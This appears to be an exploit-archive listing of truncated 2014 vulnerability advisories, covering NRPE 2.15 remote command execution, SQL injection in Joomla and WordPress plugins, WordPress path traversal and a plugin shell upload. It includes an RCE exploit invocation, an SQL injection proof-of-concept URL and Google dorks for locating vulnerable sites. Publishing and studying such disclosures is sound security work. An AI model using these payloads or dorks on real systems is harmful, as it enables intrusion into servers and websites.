NRPE 2.15 Remote Command Execution python Exploit – CVE-2014-2913
Download Exploit: HERE
Custom Command Mode: claudio@backbox3:~/Desktop$ ./nrpe_215_rce_exploit.py -H 10.0.0.70 --cmd="id" -c check_users
$$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$$$$$$\
$$$\ $$ |$$ __$$\ $$ __$$\ $$ _____| $$ __$$\ $$$$ | $$ ____|
$$$$\ $$ |$$ | $$ |$$ | $$ |$$ | \__/ $$ | \_$$ | $$ |
$$ $$\$$ |$$$$$$$ |$$$$$$$ |$$$$$\ $$$$$$ | $$ | $$$$$$$\
$$ \$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \_____$$\
$$ |\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\ $$ |
$$ | \$$ |$$ | $$ |$$ | $$$$$$$$\ $$$$$$$$\ $$\ $$$$$$\$$$$$$ |
\__| \__|\__| \__|\__| \________| \________|\__|\______|\______/
$$$$$$$\ $$$$$$\ $$$$$$$$\
$$ __$$\ $$ __$$\ $$ _____|
$$ | $$ |$$ / \__|$$ |
$$$$$$$ |$$ | $$$$$\
$$ __$$< $$ | $$ __|
$$ | $$ |$$ | $$\ $$ |
$$ | $$ |\$$$$$$ |$$$$$$$$\
\__| \__| \______/ \________|
NRPE <= 2....
######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
# Dork Google: inurl:/component/spidervideoplayer
inurl:option=com_spidervideoplayer # Date : 2014-08-26
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
"theme" variable is not sanitized.
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www....
######################
# Exploit Title : WordPress GB Gallery Slideshow 1.5 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://gb-plugins.com/
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
# Date : 2014-08-09
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
Linux / Mozilla Firefox
######################
# Location : http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
######################
# Vulnerable code :
if(isset($_POST['selected_group'])){
global $gb_post_type, $gb_group_table, $wpdb;
$my_group_id = $_POST['selected_group'];
$my_group = $wpdb->get_results( "SELECT groups FROM $gb_group_table WHERE id = "....
######################
# Exploit Title : WordPress 3.x, 4.x Path Traversal + Directory Listing + File Deletion Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://wordpress.org
# Software Link : http://wordpress.org/wordpress-3.9.2.tar.gz
# Date : 2014-07-11
# Tested on : Mozilla Firefox / WordPress 4.0 beta 1
# Mozilla Firefox / WordPress 4.0 beta 2
# Mozilla Firefox / WordPress 4.0 beta 3
# Mozilla Firefox / WordPress 3....
######################
# Exploit Title : WordPress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.codeasily.com/
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip
# Date : 2014-08-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description : Any authenticated user could upload php files (administrator by default).
######################
# Vulnerability Disclosure Timeline:
2014-08-01: Discovered vulnerability
2014-08-01: Vendor Notification (Twitter)
2014-08-01: Vendor Response/Feedback 2014-08-02: Vendor Fix/Patch 2014-08-02: Public Disclosure ######################
# PoC:
POST
Host=127....